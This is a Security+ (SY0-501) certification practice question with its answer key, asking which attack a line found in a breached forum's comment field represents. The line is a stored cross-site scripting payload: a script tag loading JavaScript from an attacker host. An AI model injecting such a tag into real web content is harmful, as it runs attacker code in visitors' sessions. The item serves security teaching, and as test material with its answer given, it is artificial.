CompTIA Security+ (SY0-501) — Question 522

A security engineer is analyzing the following line of JavaScript code that was found in a comment field on a web forum, which was recently involved in a security breach:
<script src=http://gotcha.com/hackme.js></script>
Given the line of code above, which of the following BEST represents the attack performed during the breach?

Answer options

• A. CSRF
• B. DDoS
• C. DoS
• D. XSS

Correct answer: D

Explanation

The correct answer is D, XSS (Cross-Site Scripting), as the JavaScript code could allow an attacker to execute malicious scripts in the context of a user's session. Options A (CSRF) and B (DDoS) do not apply, as CSRF involves unauthorized commands from a user and DDoS refers to overwhelming services with traffic. Option C (DoS) relates to service disruption, which is not directly represented by this code snippet.